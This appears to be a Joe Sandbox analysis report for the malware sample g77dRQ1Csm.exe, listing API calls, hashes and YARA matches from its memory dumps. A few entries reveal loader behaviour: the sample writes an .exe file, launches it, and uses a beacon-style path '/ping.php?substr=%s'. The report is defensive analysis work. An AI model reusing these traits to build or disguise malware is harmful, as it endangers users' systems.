                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction ID: a2ff0fc0dee4949f7368ef600e09552faf33b3920eee764b915ba0175271a6d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7601D17A240B0167D632E6F96C84A6B221EABCE2B87250164F426A62D0EF25C8624175
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041ED86
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041ED98
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EDAA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EDBC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EDCE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                                                                                              • Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03165537
                                                                                                                                                                                                                                • Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
                                                                                                                                                                                                                                • Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03165549
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316555C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316556D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316557E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction ID: bf554a4187419c90b3263350529224edecc2c7c5a78241ead2f60f23a6aff97d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F054B48112109BCA27EF94FC516053B61FB08714316756EF10456278CF3647A1CFCB
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 0-2895899722
                                                                                                                                                                                                                              • Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
                                                                                                                                                                                                                              • Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\g77dRQ1Csm.exe,00000104), ref: 0316356A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03163635
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316363F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-3535622130
                                                                                                                                                                                                                              • Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction ID: a91ee71d9bdd6af86a67c2bbb4af03e7082ce8a9b13b7743a205f7e626b6e68d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F319379A00258AFDB26DFD99C8099EBBFCEB8C710F14446AE5149B220D7708A51CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\g77dRQ1Csm.exe,00000104), ref: 00413303
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-3535622130
                                                                                                                                                                                                                              • Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 031767B9
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 031767CD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 031767D6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 3837156514-4119554291
                                                                                                                                                                                                                              • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction ID: 5c6bd5c18b25c4e9c7339040dcdf42e7ba84b514a6a32d2551fb326b22076c7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80017831E0061CEBDF15DFA9E8459DDBBB8FF08640F048126F811A6260EB709A45CF84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,03175B74,00000001,?,/ping.php?substr=%s), ref: 031764C4
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,03175B74,00000001,?,/ping.php?substr=%s,?), ref: 031764DC
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,03175B74,00000001,?,/ping.php?substr=%s,?), ref: 031764E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 1065093856-4119554291
                                                                                                                                                                                                                              • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction ID: 5e73e12e18219dd744e99dcc3dc0431da708202de587ae7b0331afe7dee1aadd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51E06572601124BBD7311B999C48FA7BE7CEF895A0F040125FB05D21109661DC0197B4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction ID: 1a420f221788eb9a63b1ebce3aecd31cf68db7238e45580b76d91c00a2e2a947
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46A16572A00B869FEB25CF98C8907BEFBE5EF1D350F1841ADD9959B280C7388991C750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                                                                                              • Instruction ID: bbeac878f15907364bbb21a4a4bb9b4b923ff445699c417e24aeca58f65a0a9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F411735A003056BDB35EEF88C88AAE36B9EF4D370F1C0E55F418DB190DB75859382A2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
                                                                                                                                                                                                                              • Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,03164002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 0316B5B4
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0316B63D
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0316B64F
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0316B658
                                                                                                                                                                                                                                • Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                              • Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                                                                                              • Instruction ID: c0e1468dd0d7e55b6eb206505619a1c0565fa4d825d2e733e564dc91b712107c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A531C172A1020AABDF25DFA5CC44DAE7BA5EF48310F088169FC18DB150EB35CD60CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0315CF2B
                                                                                                                                                                                                                                • Part of subcall function 0315CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0315CEA7
                                                                                                                                                                                                                                • Part of subcall function 0315CE78: ___AdjustPointer.LIBCMT ref: 0315CEC2
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0315CF40
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0315CF51
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0315CF79
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction ID: b164839f8546e13ab4c05bc1cb922cf1e64e58a5da62cfcfe366b8e81ae94921
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15011732100208FBDF12AF95DC40EEB7B69EF9D754F044115FE28AA120D732E9629BA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4
                                                                                                                                                                                                                                • Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
                                                                                                                                                                                                                                • Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0040CCD9
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0040CD12
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0315ED94,00000000,00000000,?,03167461,0315ED94,00000000,00000000,00000000,?,03167719,00000006,0042F348), ref: 031674EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,03167461,0315ED94,00000000,00000000,00000000,?,03167719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,03167052), ref: 031674F8
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,03167461,0315ED94,00000000,00000000,00000000,?,03167719,00000006,0042F348,0042F340,0042F348,00000000), ref: 03167506
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction ID: 483d3c8fae24f4a59a03601989e4a23942030f08b7b5fee0ac745a4bb6869db7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE01F7367512279BC731CFB8AC58A567B9CAF097A6B5505B0FA0AD31C0EB20D921C6E4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
